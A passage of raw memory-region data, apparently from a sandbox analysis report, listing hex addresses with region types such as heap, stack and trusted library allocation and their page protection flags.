page read and write
|
||
29AADF08000
|
trusted library allocation
|
page read and write
|
||
7FF848FCA000
|
trusted library allocation
|
page read and write
|
||
29AACDE9000
|
trusted library allocation
|
page read and write
|
||
5FBE000
|
stack
|
page read and write
|
||
1DE805D1000
|
heap
|
page read and write
|
||
4DFE000
|
trusted library allocation
|
page read and write
|
||
79081DE000
|
stack
|
page read and write
|
||
29AACB8C000
|
trusted library allocation
|
page read and write
|
||
243FE60E000
|
heap
|
page read and write
|
||
29AAEA81000
|
trusted library allocation
|
page read and write
|
||
29AADDA6000
|
trusted library allocation
|
page read and write
|
||
29AACD2A000
|
trusted library allocation
|
page read and write
|
||
29AAD616000
|
trusted library allocation
|
page read and write
|
||
29AAE0B8000
|
trusted library allocation
|
page read and write
|
||
5FC0000
|
heap
|
page read and write
|
||
2125D320000
|
heap
|
page read and write
|
||
29AAF006000
|
trusted library allocation
|
page read and write
|
||
29AAF296000
|
trusted library allocation
|
page read and write
|
||
243FE71B000
|
heap
|
page read and write
|
||
1DE8247B000
|
heap
|
page read and write
|
||
29ABB7AD000
|
trusted library allocation
|
page read and write
|
||
29AACF96000
|
trusted library allocation
|
page read and write
|
||
29AAF14E000
|
trusted library allocation
|
page read and write
|
||
29AACACE000
|
trusted library allocation
|
page read and write
|
||
29AACC7B000
|
trusted library allocation
|
page read and write
|
||
29AAF0DE000
|
trusted library allocation
|
page read and write
|
||
29AAF3FA000
|
trusted library allocation
|
page read and write
|
||
625D000
|
stack
|
page read and write
|
||
79080D3000
|
stack
|
page read and write
|
||
1F5506C6000
|
heap
|
page read and write
|
||
5270000
|
trusted library allocation
|
page execute and read and write
|
||
243FE5A3000
|
heap
|
page read and write
|
||
29AAD726000
|
trusted library allocation
|
page read and write
|
||
1DE805D4000
|
heap
|
page read and write
|
||
29AAECA5000
|
trusted library allocation
|
page read and write
|
||
29AAEA0A000
|
trusted library allocation
|
page read and write
|
||
29AAE548000
|
trusted library allocation
|
page read and write
|
||
29AAEF6E000
|
trusted library allocation
|
page read and write
|
||
29AA8244000
|
heap
|
page read and write
|
||
38D1000
|
trusted library allocation
|
page read and write
|
||
1DE80630000
|
heap
|
page read and write
|
||
29AAF17E000
|
trusted library allocation
|
page read and write
|
||
1DE805F9000
|
heap
|
page read and write
|
||
29AAE1E8000
|
trusted library allocation
|
page read and write
|
||
29AAC9AF000
|
trusted library allocation
|
page read and write
|
||
212AADC8000
|
heap
|
page read and write
|
||
29AAE6C8000
|
trusted library allocation
|
page read and write
|
||
1DE8250A000
|
heap
|
page read and write
|
||
29AAC940000
|
trusted library allocation
|
page read and write
|
||
4DEE000
|
stack
|
page read and write
|
||
29AADA56000
|
trusted library allocation
|
page read and write
|
||
1DE82459000
|
heap
|
page read and write
|
||
29AAEC8D000
|
trusted library allocation
|
page read and write
|
||
1DE805E7000
|
heap
|
page read and write
|
||
1F5506CD000
|
heap
|
page read and write
|
||
29AAF1DE000
|
trusted library allocation
|
page read and write
|
||
29AAD2A5000
|
trusted library allocation
|
page read and write
|
||
1F550761000
|
heap
|
page read and write
|
||
243FE599000
|
heap
|
page read and write
|
||
29AAD806000
|
trusted library allocation
|
page read and write
|
||
29AAEB4F000
|
trusted library allocation
|
page read and write
|
||
243FE74B000
|
heap
|
page read and write
|
||
29AAD916000
|
trusted library allocation
|
page read and write
|
||
1F55075E000
|
heap
|
page read and write
|
||
29AAA4C1000
|
trusted library allocation
|
page read and write
|
||
29AAD4C6000
|
trusted library allocation
|
page read and write
|
||
29AADE87000
|
trusted library allocation
|
page read and write
|
||
29AAEEAE000
|
trusted library allocation
|
page read and write
|
||
29AACB4D000
|
trusted library allocation
|
page read and write
|
||
79084FD000
|
stack
|
page read and write
|
||
BFD807E000
|
stack
|
page read and write
|
||
1DE805EE000
|
heap
|
page read and write
|
||
29AADBC6000
|
trusted library allocation
|
page read and write
|
||
1F550855000
|
heap
|
page read and write
|
||
1F5506C5000
|
heap
|
page read and write
|
||
29AACB1D000
|
trusted library allocation
|
page read and write
|
||
1F550859000
|
heap
|
page read and write
|
||
212AADE8000
|
heap
|
page read and write
|
||
29AAF41A000
|
trusted library allocation
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
1F550760000
|
heap
|
page read and write
|
||
243FE883000
|
heap
|
page read and write
|
||
212AD264000
|
trusted library allocation
|
page read and write
|
||
BFD8FCD000
|
stack
|
page read and write
|
||
1F55076B000
|
heap
|
page read and write
|
||
29AAE1B8000
|
trusted library allocation
|
page read and write
|
||
29AAEDFE000
|
trusted library allocation
|
page read and write
|
||
243FE563000
|
heap
|
page read and write
|
||
29AACD59000
|
trusted library allocation
|
page read and write
|
||
2ECE8FE000
|
stack
|
page read and write
|
||
29AAED2D000
|
trusted library allocation
|
page read and write
|
||
BA6000
|
heap
|
page read and write
|
||
29AAED86000
|
trusted library allocation
|
page read and write
|
||
29AAED95000
|
trusted library allocation
|
page read and write
|
||
29AACB7D000
|
trusted library allocation
|
page read and write
|
||
243FC78A000
|
heap
|
page read and write
|
||
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
29AAF287000
|
trusted library allocation
|
page read and write
|
||
5160000
|
heap
|
page read and write
|
||
29AAD886000
|
trusted library allocation
|
page read and write
|
||
29AADF6C000
|
trusted library allocation
|
page read and write
|
||
29AAE338000
|
trusted library allocation
|
page read and write
|
||
29AAE368000
|
trusted library allocation
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
8A81FE000
|
stack
|
page read and write
|
||
29AAF468000
|
trusted library allocation
|
page read and write
|
||
29AAD8C6000
|
trusted library allocation
|
page read and write
|
||
29AAEB8E000
|
trusted library allocation
|
page read and write
|
||
1F550580000
|
heap
|
page read and write
|
||
21277604000
|
heap
|
page read and write
|
||
243FE86E000
|
heap
|
page read and write
|
||
29AAD7E6000
|
trusted library allocation
|
page read and write
|
||
29AAEE0E000
|
trusted library allocation
|
page read and write
|
||
29AAD846000
|
trusted library allocation
|
page read and write
|
||
1DE82497000
|
heap
|
page read and write
|
||
29AAF08E000
|
trusted library allocation
|
page read and write
|
||
29AADB56000
|
trusted library allocation
|
page read and write
|
||
29AAD045000
|
trusted library allocation
|
page read and write
|
||
212BCCEF000
|
trusted library allocation
|
page read and write
|
||
29AAEB37000
|
trusted library allocation
|
page read and write
|
||
29AACB5D000
|
trusted library allocation
|
page read and write
|
||
265D000
|
trusted library allocation
|
page read and write
|
||
29AAE538000
|
trusted library allocation
|
page read and write
|
||
29AAE148000
|
trusted library allocation
|
page read and write
|
||
29AAD8A6000
|
trusted library allocation
|
page read and write
|
||
1F5524E4000
|
heap
|
page read and write
|
||
29AAF096000
|
trusted library allocation
|
page read and write
|
||
1F5524DF000
|
heap
|
page read and write
|
||
29AAE0E8000
|
trusted library allocation
|
page read and write
|
||
1DE80540000
|
heap
|
page read and write
|
||
243FC795000
|
heap
|
page read and write
|
||
243FE5D5000
|
heap
|
page read and write
|
||
29AACE78000
|
trusted library allocation
|
page read and write
|
||
29AAEA79000
|
trusted library allocation
|
page read and write
|
||
29AAD4B6000
|
trusted library allocation
|
page read and write
|
||
29AAD285000
|
trusted library allocation
|
page read and write
|
||
1F5525B4000
|
heap
|
page read and write
|
||
29AAF06E000
|
trusted library allocation
|
page read and write
|
||
212AD29A000
|
trusted library allocation
|
page read and write
|
||
29AAD8E6000
|
trusted library allocation
|
page read and write
|
||
29AAC9DF000
|
trusted library allocation
|
page read and write
|
||
29AAE5E8000
|
trusted library allocation
|
page read and write
|
||
29ABA131000
|
trusted library allocation
|
page read and write
|
||
83B000
|
stack
|
page read and write
|
||
29AACFA6000
|
trusted library allocation
|
page read and write
|
||
29AAE728000
|
trusted library allocation
|
page read and write
|
||
52A1000
|
trusted library allocation
|
page read and write
|
||
1F552775000
|
heap
|
page read and write
|
||
29AAE807000
|
trusted library allocation
|
page read and write
|
||
29AAD736000
|
trusted library allocation
|
page read and write
|
||
212ACD07000
|
trusted library allocation
|
page read and write
|
||
29AAD0D4000
|
trusted library allocation
|
page read and write
|
||
243FE710000
|
heap
|
page read and write
|
||
29AADF7C000
|
trusted library allocation
|
page read and write
|
||
1F552517000
|
heap
|
page read and write
|
||
29AAE9F4000
|
trusted library allocation
|
page read and write
|
||
29AAF16E000
|
trusted library allocation
|
page read and write
|
||
1DE8252F000
|
heap
|
page read and write
|
||
29AAEE46000
|
trusted library allocation
|
page read and write
|
||
29AADC86000
|
trusted library allocation
|
page read and write
|
||
2ECE87E000
|
stack
|
page read and write
|
||
8A7CF9000
|
stack
|
page read and write
|
||
243FC99C000
|
heap
|
page read and write
|
||
1F550698000
|
heap
|
page read and write
|
||
1F5524FB000
|
heap
|
page read and write
|
||
29AAD055000
|
trusted library allocation
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
243FE883000
|
heap
|
page read and write
|
||
29AAEDAD000
|
trusted library allocation
|
page read and write
|
||
243FE521000
|
heap
|
page read and write
|
||
29AACA1F000
|
trusted library allocation
|
page read and write
|
||
29AACD1A000
|
trusted library allocation
|
page read and write
|
||
7FF848FD0000
|
trusted library allocation
|
page execute and read and write
|
||
29AADD56000
|
trusted library allocation
|
page read and write
|
||
243FE5A3000
|
heap
|
page read and write
|
||
29AAEB27000
|
trusted library allocation
|
page read and write
|
||
29AA9BB0000
|
heap
|
page execute and read and write
|
||
29AAF10E000
|
trusted library allocation
|
page read and write
|
||
243FE863000
|
heap
|
page read and write
|
||
29AAE668000
|
trusted library allocation
|
page read and write
|
||
29AAD466000
|
trusted library allocation
|
page read and write
|
||
212AAF20000
|
heap
|
page read and write
|
||
29AAD168000
|
trusted library allocation
|
page read and write
|
||
29AAEC2D000
|
trusted library allocation
|
page read and write
|
||
29AAF264000
|
trusted library allocation
|
page read and write
|
||
29AACC5B000
|
trusted library allocation
|
page read and write
|
||
790867E000
|
stack
|
page read and write
|
||
659D000
|
stack
|
page read and write
|
||
243FC78A000
|
heap
|
page read and write
|
||
29AAF529000
|
trusted library allocation
|
page read and write
|
||
2125F513000
|
trusted library allocation
|
page read and write
|
||
1DE82466000
|
heap
|
page read and write
|
||
29AAEF0D000
|
trusted library allocation
|
page read and write
|
||
393B000
|
trusted library allocation
|
page read and write
|
||
29AAE758000
|
trusted library allocation
|
page read and write
|
||
29AAE348000
|
trusted library allocation
|
page read and write
|
||
29AAE3C8000
|
trusted library allocation
|
page read and write
|
||
29AAD976000
|
trusted library allocation
|
page read and write
|
||
29AAEFDE000
|
trusted library allocation
|
page read and write
|
||
1F550858000
|
heap
|
page read and write
|
||
29AAE995000
|
trusted library allocation
|
page read and write
|
||
29AAE468000
|
trusted library allocation
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
29AAEAE0000
|
trusted library allocation
|
page read and write
|
||
29AAE098000
|
trusted library allocation
|
page read and write
|
||
29AACEE7000
|
trusted library allocation
|
page read and write
|
||
243FE721000
|
heap
|
page read and write
|
||
29AAE5B8000
|
trusted library allocation
|
page read and write
|
||
243FE71A000
|
heap
|
page read and write
|
||
29AADB26000
|
trusted library allocation
|
page read and write
|
||
1F55075D000
|
heap
|
page read and write
|
||
29AAEF1E000
|
trusted library allocation
|
page read and write
|
||
2125D392000
|
heap
|
page read and write
|
||
29AADCE6000
|
trusted library allocation
|
page read and write
|
||
1DE805F9000
|
heap
|
page read and write
|
||
243FC702000
|
heap
|
page read and write
|
||
29AAD6B6000
|
trusted library allocation
|
page read and write
|
||
1F552581000
|
heap
|
page read and write
|
||
29AADD76000
|
trusted library allocation
|
page read and write
|
||
1F5524F0000
|
heap
|
page read and write
|
||
5499000
|
stack
|
page read and write
|
||
29AAEDB6000
|
trusted library allocation
|
page read and write
|
||
1DE80550000
|
heap
|
page read and write
|
||
29AAEEB6000
|
trusted library allocation
|
page read and write
|
||
29AAE058000
|
trusted library allocation
|
page read and write
|
||
29AADA76000
|
trusted library allocation
|
page read and write
|
||
29AAED45000
|
trusted library allocation
|
page read and write
|
||
29AAD306000
|
trusted library allocation
|
page read and write
|
||
1F552090000
|
heap
|
page read and write
|
||
4A6D000
|
stack
|
page read and write
|
||
1F5525BF000
|
heap
|
page read and write
|
||
29AAE1A8000
|
trusted library allocation
|
page read and write
|
||
29AAD5C6000
|
trusted library allocation
|
page read and write
|
||
29AAC950000
|
trusted library allocation
|
page read and write
|
||
29AAEF66000
|
trusted library allocation
|
page read and write
|
||
29AAC720000
|
trusted library allocation
|
page read and write
|
||
2125F5F4000
|
trusted library allocation
|
page read and write
|
||
61DE000
|
stack
|
page read and write
|
||
29AAEB66000
|
trusted library allocation
|
page read and write
|
||
29AAEA4A000
|
trusted library allocation
|
page read and write
|
||
29AAD4D6000
|
trusted library allocation
|
page read and write
|
||
2125D5F0000
|
heap
|
page read and write
|
||
46B3CFF000
|
stack
|
page read and write
|
||
1DE824C1000
|
heap
|
page read and write
|
||
29AAF1A6000
|
trusted library allocation
|
page read and write
|
||
1F5524E0000
|
heap
|
page read and write
|
||
29AACDD9000
|
trusted library allocation
|
page read and write
|
||
4DF0000
|
trusted library allocation
|
page read and write
|
||
29AAE048000
|
trusted library allocation
|
page read and write
|
||
29AAEAD8000
|
trusted library allocation
|
page read and write
|
||
29AAE488000
|
trusted library allocation
|
page read and write
|
||
29AAF1E6000
|
trusted library allocation
|
page read and write
|
||
29AAD796000
|
trusted library allocation
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
243FE529000
|
heap
|
page read and write
|
||
8A82FE000
|
stack
|
page read and write
|
||
243FE60E000
|
heap
|
page read and write
|
||
1F5506C0000
|
heap
|
page read and write
|
||
27B0000
|
trusted library allocation
|
page read and write
|
||
1F5506C0000
|
heap
|
page read and write
|
||
29AAF436000
|
trusted library allocation
|
page read and write
|
||
29AAD326000
|
trusted library allocation
|
page read and write
|
||
1F5525A2000
|
heap
|
page read and write
|
||
243FC78A000
|
heap
|
page read and write
|
||
29AAF426000
|
trusted library allocation
|
page read and write
|
||
29AAE248000
|
trusted library allocation
|
page read and write
|
||
1F550765000
|
heap
|
page read and write
|
||
29AAEF36000
|
trusted library allocation
|
page read and write
|
||
BFD817F000
|
stack
|
page read and write
|
||
29AAF44A000
|
trusted library allocation
|
page read and write
|
||
243FE5F5000
|
heap
|
page read and write
|
||
BFD837F000
|
stack
|
page read and write
|
||
29AAF186000
|
trusted library allocation
|
page read and write
|
||
BFD7B23000
|
stack
|
page read and write
|
||
29AAF260000
|
trusted library allocation
|
page read and write
|
||
29AAEFA6000
|
trusted library allocation
|
page read and write
|
||
243FC79B000
|
heap
|
page read and write
|
||
1F5506D0000
|
heap
|
page read and write
|
||
29AAD255000
|
trusted library allocation
|
page read and write
|
||
1DE82519000
|
heap
|
page read and write
|
||
7FF848ED0000
|
trusted library allocation
|
page execute and read and write
|
||
29AAD526000
|
trusted library allocation
|
page read and write
|
||
29AAEFEE000
|
trusted library allocation
|
page read and write
|
||
9E6000
|
heap
|
page read and write
|
||
29AAEDA5000
|
trusted library allocation
|
page read and write
|
||
29AAE9D5000
|
trusted library allocation
|
page read and write
|
||
2125F3E0000
|
heap
|
page read and write
|
||
243FC510000
|
heap
|
page read and write
|
||
29AAE837000
|
trusted library allocation
|
page read and write
|
||
2125F3F9000
|
heap
|
page read and write
|
||
29AAE3E8000
|
trusted library allocation
|
page read and write
|
||
1F550660000
|
heap
|
page read and write
|
||
1F5524F7000
|
heap
|
page read and write
|
||
29AAD3F6000
|
trusted library allocation
|
page read and write
|
||
27C0000
|
heap
|
page execute and read and write
|
||
29AAEF26000
|
trusted library allocation
|
page read and write
|
||
212AB050000
|
heap
|
page read and write
|
||
5570000
|
heap
|
page read and write
|
||
29AADD66000
|
trusted library allocation
|
page read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
1DE82457000
|
heap
|
page read and write
|
||
29AAF05E000
|
trusted library allocation
|
page read and write
|
||
243FC73D000
|
heap
|
page read and write
|
||
BFD8F4E000
|
stack
|
page read and write
|
||
29AACCBA000
|
trusted library allocation
|
page read and write
|
||
29AAD366000
|
trusted library allocation
|
page read and write
|
||
1F552030000
|
heap
|
page read and write
|
||
1F55085A000
|
heap
|
page read and write
|
||
212AAD7E000
|
heap
|
page read and write
|
||
29AACED7000
|
trusted library allocation
|
page read and write
|
||
29AACC4B000
|
trusted library allocation
|
page read and write
|
||
29AAD866000
|
trusted library allocation
|
page read and write
|
||
29AADE67000
|
trusted library allocation
|
page read and write
|
||
29AAE408000
|
trusted library allocation
|
page read and write
|
||
29AAE198000
|
trusted library allocation
|
page read and write
|
||
212C53D0000
|
heap
|
page read and write
|
||
2125F604000
|
trusted library allocation
|
page read and write
|
||
1DE8246B000
|
heap
|
page read and write
|
||
243FE878000
|
heap
|
page read and write
|
||
29AAE528000
|
trusted library allocation
|
page read and write
|
||
29AADF88000
|
trusted library allocation
|
page read and write
|
||
1DE8055D000
|
heap
|
page read and write
|
||
29AAD756000
|
trusted library allocation
|
page read and write
|
||
29AAEDE6000
|
trusted library allocation
|
page read and write
|
||
29AAE578000
|
trusted library allocation
|
page read and write
|
||
29AADAA6000
|
trusted library allocation
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
212AAF40000
|
heap
|
page read and write
|
||
243FC750000
|
heap
|
page read and write
|
||
1DE807EE000
|
heap
|
page read and write
|
||
29AADA16000
|
trusted library allocation
|
page read and write
|
||
29AAE848000
|
trusted library allocation
|
page read and write
|
||
243FE797000
|
heap
|
page read and write
|
||
29AAEDCE000
|
trusted library allocation
|
page read and write
|
||
29AAF3E2000
|
trusted library allocation
|
page read and write
|
||
29AAF273000
|
trusted library allocation
|
page read and write
|
||
29AAD786000
|
trusted library allocation
|
page read and write
|
||
29AAEBA6000
|
trusted library allocation
|
page read and write
|
||
29AAECE5000
|
trusted library allocation
|
page read and write
|
||
AC0000
|
heap
|
page read and write
|
||
29AAED06000
|
trusted library allocation
|
page read and write
|
||
243FC756000
|
heap
|
page read and write
|
||
1DE82464000
|
heap
|
page read and write
|
||
1DE80560000
|
heap
|
page read and write
|
||
29AAE018000
|
trusted library allocation
|
page read and write
|
||
1DE80528000
|
heap
|
page read and write
|
||
29AACE97000
|
trusted library allocation
|
page read and write
|
||
29AAD174000
|
trusted library allocation
|
page read and write
|
||
29AAD386000
|
trusted library allocation
|
page read and write
|
||
29AAE2F8000
|
trusted library allocation
|
page read and write
|
||
790883D000
|
stack
|
page read and write
|
||
29AADDE6000
|
trusted library allocation
|
page read and write
|
||
29AACA3F000
|
trusted library allocation
|
page read and write
|
||
29AADA36000
|
trusted library allocation
|
page read and write
|
||
29AA82A8000
|
heap
|
page read and write
|
||
29AAD1F4000
|
trusted library allocation
|
page read and write
|
||
29AADEE7000
|
trusted library allocation
|
page read and write
|
||
29AAF026000
|
trusted library allocation
|
page read and write
|
||
29AAA2D3000
|
trusted library allocation
|
page read and write
|
||
29AADC36000
|
trusted library allocation
|
page read and write
|
||
29AAF04E000
|
trusted library allocation
|
page read and write
|
||
29AAEED6000
|
trusted library allocation
|
page read and write
|
||
29AAEE3E000
|
trusted library allocation
|
page read and write
|
||
243FE711000
|
heap
|
page read and write
|
||
29AAD6E6000
|
trusted library allocation
|
page read and write
|
||
29AAF116000
|
trusted library allocation
|
page read and write
|
||
2125F35F000
|
heap
|
page read and write
|
||
46B3EFB000
|
stack
|
page read and write
|
||
29AAD154000
|
trusted library allocation
|
page read and write
|
||
29AAEB7E000
|
trusted library allocation
|
page read and write
|
||
1F552774000
|
heap
|
page read and write
|
||
29AACECC000
|
trusted library allocation
|
page read and write
|
||
29AAD234000
|
trusted library allocation
|
page read and write
|
||
1F5524F7000
|
heap
|
page read and write
|
||
1DE824E1000
|
heap
|
page read and write
|
||
243FE3F3000
|
heap
|
page read and write
|
||
24EE000
|
stack
|
page read and write
|
||
29AAA4BD000
|
trusted library allocation
|
page read and write
|
||
29AADC76000
|
trusted library allocation
|
page read and write
|
||
1DE8264E000
|
heap
|
page read and write
|
||
29AAD546000
|
trusted library allocation
|
page read and write
|
||
5050000
|
heap
|
page execute and read and write
|
||
29AAF412000
|
trusted library allocation
|
page read and write
|
||
1F5506C6000
|
heap
|
page read and write
|
||
212C4FD0000
|
heap
|
page execute and read and write
|
||
29AADF78000
|
trusted library allocation
|
page read and write
|
||
2ECE6FF000
|
stack
|
page read and write
|
||
243FE40B000
|
heap
|
page read and write
|
||
212ACE01000
|
trusted library allocation
|
page read and write
|
||
243FC77D000
|
heap
|
page read and write
|
||
29AAA52D000
|
trusted library allocation
|
page read and write
|
||
243FE5B6000
|
heap
|
page read and write
|
||
29AA8274000
|
heap
|
page read and write
|
||
29AAF196000
|
trusted library allocation
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
29AAE858000
|
trusted library allocation
|
page read and write
|
||
29AADD06000
|
trusted library allocation
|
page read and write
|
||
29AAF40E000
|
trusted library allocation
|
page read and write
|
||
29AAECD5000
|
trusted library allocation
|
page read and write
|
||
29AAA0A0000
|
heap
|
page read and write
|
||
243FE5A3000
|
heap
|
page read and write
|
||
243FC7E0000
|
heap
|
page read and write
|
||
2125D5A0000
|
heap
|
page readonly
|
||
21277676000
|
heap
|
page read and write
|
||
1DE805D5000
|
heap
|
page read and write
|
||
212ACE50000
|
trusted library allocation
|
page read and write
|
||
29AADE47000
|
trusted library allocation
|
page read and write
|
||
29AAEF96000
|
trusted library allocation
|
page read and write
|
||
212AAFF0000
|
heap
|
page readonly
|
||
29AAE068000
|
trusted library allocation
|
page read and write
|
||
29AAA489000
|
trusted library allocation
|
page read and write
|
||
1F5524D6000
|
heap
|
page read and write
|
||
243FC749000
|
heap
|
page read and write
|
||
243FC7E0000
|
heap
|
page read and write
|
||
29AACCEA000
|
trusted library allocation
|
page read and write
|
||
29AAF1CE000
|
trusted library allocation
|
page read and write
|
||
212C4E01000
|
heap
|
page read and write
|
||
2125D3EB000
|
heap
|
page read and write
|
||
29AACD4A000
|
trusted library allocation
|
page read and write
|
||
29AAF11E000
|
trusted library allocation
|
page read and write
|
||
243FC726000
|
heap
|
page read and write
|
||
29AAE168000
|
trusted library allocation
|
page read and write
|
||
29AACF3C000
|
trusted library allocation
|
page read and write
|
||
29AAF0CE000
|
trusted library allocation
|
page read and write
|
||
29AAEBED000
|
trusted library allocation
|
page read and write
|
||
48D8000
|
trusted library allocation
|
page read and write
|
||
AAA000
|
trusted library allocation
|
page execute and read and write
|
||
551E000
|
stack
|
page read and write
|
||
1F5525A5000
|
heap
|
page read and write
|
||
29AAD876000
|
trusted library allocation
|
page read and write
|
||
29AADE37000
|
trusted library allocation
|
page read and write
|
||
29AACD89000
|
trusted library allocation
|
page read and write
|
||
1F5524D1000
|
heap
|
page read and write
|
||
B00000
|
heap
|
page read and write
|
||
1F5506BA000
|
heap
|
page read and write
|
||
4E22000
|
trusted library allocation
|
page read and write
|
||
29AAF1C6000
|
trusted library allocation
|
page read and write
|
||
1F550858000
|
heap
|
page read and write
|
||
243FC795000
|
heap
|
page read and write
|
||
ABB000
|
trusted library allocation
|
page execute and read and write
|
||
29AAD2F6000
|
trusted library allocation
|
page read and write
|
||
29AAD5E6000
|
trusted library allocation
|
page read and write
|
||
1F554330000
|
trusted library allocation
|
page read and write
|
||
29AAF27F000
|
trusted library allocation
|
page read and write
|
||
29AAD706000
|
trusted library allocation
|
page read and write
|
||
212AAD79000
|
heap
|
page read and write
|
||
1F5525AE000
|
heap
|
page read and write
|
||
29AAEB1F000
|
trusted library allocation
|
page read and write
|
||
29AACAED000
|
trusted library allocation
|
page read and write
|
||
1F55403E000
|
heap
|
page read and write
|
||
243FC78F000
|
heap
|
page read and write
|
||
990000
|
heap
|
page read and write
|
||
1F552514000
|
heap
|
page read and write
|
||
639E000
|
unkown
|
page read and write
|
||
1F55076B000
|
heap
|
page read and write
|
||
29AAE118000
|
trusted library allocation
|
page read and write
|
||
1F550763000
|
heap
|
page read and write
|
||
29AAF146000
|
trusted library allocation
|
page read and write
|
||
1DE82451000
|
heap
|
page read and write
|
||
1DE82470000
|
heap
|
page read and write
|
||
29AAF1BE000
|
trusted library allocation
|
page read and write
|
||
1F5506B0000
|
heap
|
page read and write
|
||
1DE824FE000
|
heap
|
page read and write
|
||
243FC7A6000
|
heap
|
page read and write
|
||
1DE8264C000
|
heap
|
page read and write
|
||
29AAE7F7000
|
trusted library allocation
|
page read and write
|
||
243FE719000
|
heap
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
260C000
|
stack
|
page read and write
|
||
29AAD0A4000
|
trusted library allocation
|
page read and write
|
||
1DE805F3000
|
heap
|
page read and write
|
||
1F5524F0000
|
heap
|
page read and write
|
||
243FC610000
|
heap
|
page read and write
|
||
29AAF42E000
|
trusted library allocation
|
page read and write
|
||
29AACEB7000
|
trusted library allocation
|
page read and write
|
||
29AAE788000
|
trusted library allocation
|
page read and write
|
||
3F2B5FE000
|
stack
|
page read and write
|
||
29AAF0F6000
|
trusted library allocation
|
page read and write
|
||
29AAD6F6000
|
trusted library allocation
|
page read and write
|
||
29AAF3D6000
|
trusted library allocation
|
page read and write
|
||
2125F4D0000
|
heap
|
page execute and read and write
|
||
1DE82525000
|
heap
|
page read and write
|
||
29AAF28B000
|
trusted library allocation
|
page read and write
|
||
1F5526CE000
|
heap
|
page read and write
|
||
212C4EDE000
|
heap
|
page read and write
|
||
2610000
|
trusted library allocation
|
page execute and read and write
|
||
29AACE48000
|
trusted library allocation
|
page read and write
|
||
29AAE598000
|
trusted library allocation
|
page read and write
|
||
1DE805F1000
|
heap
|
page read and write
|
||
29AAEF86000
|
trusted library allocation
|
page read and write
|
||
29AAD114000
|
trusted library allocation
|
page read and write
|
||
212ACDFE000
|
trusted library allocation
|
page read and write
|
||
29AAEFAE000
|
trusted library allocation
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
29AAED3E000
|
trusted library allocation
|
page read and write
|
||
29ABA3AD000
|
trusted library allocation
|
page read and write
|
||
46B38FE000
|
stack
|
page read and write
|
||
29AAE208000
|
trusted library allocation
|
page read and write
|
||
29AAEFC6000
|
trusted library allocation
|
page read and write
|
||
29AADFBC000
|
trusted library allocation
|
page read and write
|
||
1F5526D1000
|
heap
|
page read and write
|
||
29AA9BB7000
|
heap
|
page execute and read and write
|
||
29AAD776000
|
trusted library allocation
|
page read and write
|
||
29AAF26F000
|
trusted library allocation
|
page read and write
|
||
4E30000
|
trusted library allocation
|
page read and write
|
||
29AACEA7000
|
trusted library allocation
|
page read and write
|
||
29AACC2B000
|
trusted library allocation
|
page read and write
|
||
243FC78F000
|
heap
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
29AAE798000
|
trusted library allocation
|
page read and write
|
||
29AAD516000
|
trusted library allocation
|
page read and write
|
||
29AACC61000
|
trusted library allocation
|
page read and write
|
||
A40000
|
heap
|
page read and write
|
||
29AAE418000
|
trusted library allocation
|
page read and write
|
||
2125F587000
|
trusted library allocation
|
page read and write
|
||
29AAE568000
|
trusted library allocation
|
page read and write
|
||
29AAD188000
|
trusted library allocation
|
page read and write
|
||
29AA8260000
|
heap
|
page read and write
|
||
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
243FC980000
|
remote allocation
|
page read and write
|
||
2125F648000
|
trusted library allocation
|
page read and write
|
||
4F00000
|
heap
|
page read and write
|
||
29AACD3A000
|
trusted library allocation
|
page read and write
|
||
29AAD476000
|
trusted library allocation
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
29AAD2B5000
|
trusted library allocation
|
page read and write
|
||
2125D69E000
|
heap
|
page read and write
|
||
29AAF3F2000
|
trusted library allocation
|
page read and write
|
||
29AAEFB6000
|
trusted library allocation
|
page read and write
|
||
29AAD646000
|
trusted library allocation
|
page read and write
|
||
243FE60E000
|
heap
|
page read and write
|
||
2125D590000
|
trusted library allocation
|
page read and write
|
||
29AAEB17000
|
trusted library allocation
|
page read and write
|
||
243FC78A000
|
heap
|
page read and write
|
||
29AACB2D000
|
trusted library allocation
|
page read and write
|
||
29AAEC65000
|
trusted library allocation
|
page read and write
|
||
1DE8250D000
|
heap
|
page read and write
|
||
29AAD094000
|
trusted library allocation
|
page read and write
|
||
29AAEE56000
|
trusted library allocation
|
page read and write
|
||
7F690000
|
trusted library allocation
|
page execute and read and write
|
||
212C4E05000
|
heap
|
page read and write
|
||
29AACE58000
|
trusted library allocation
|
page read and write
|
||
29AAF0B6000
|
trusted library allocation
|
page read and write
|
||
29AAD826000
|
trusted library allocation
|
page read and write
|
||
1DE82536000
|
heap
|
page read and write
|
||
243FE5A5000
|
heap
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
1F55258D000
|
heap
|
page read and write
|
||
29AACB3D000
|
trusted library allocation
|
page read and write
|
||
243FE7C6000
|
heap
|
page read and write
|
||
1DE8252E000
|
heap
|
page read and write
|
||
212AD3EA000
|
trusted library allocation
|
page read and write
|
||
1F552523000
|
heap
|
page read and write
|
||
243FE0A0000
|
heap
|
page read and write
|
||
29AAD666000
|
trusted library allocation
|
page read and write
|
||
29AAD626000
|
trusted library allocation
|
page read and write
|
||
29AAD746000
|
trusted library allocation
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
1DE807E8000
|
heap
|
page read and write
|
||
212AD2E4000
|
trusted library allocation
|
page read and write
|
||
29AA9B90000
|
heap
|
page readonly
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
29AAE7B8000
|
trusted library allocation
|
page read and write
|
||
243FE742000
|
heap
|
page read and write
|
||
29AACBBC000
|
trusted library allocation
|
page read and write
|
||
29AAEF9E000
|
trusted library allocation
